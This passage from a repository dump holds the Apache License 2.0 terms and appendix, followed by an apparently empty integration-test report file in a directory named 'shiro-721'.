Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /shiro-721/target/failsafe-reports/TEST-org.apache.shiro.test.ContainerIntegrationIT.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | --------------------------------------------------------------------------------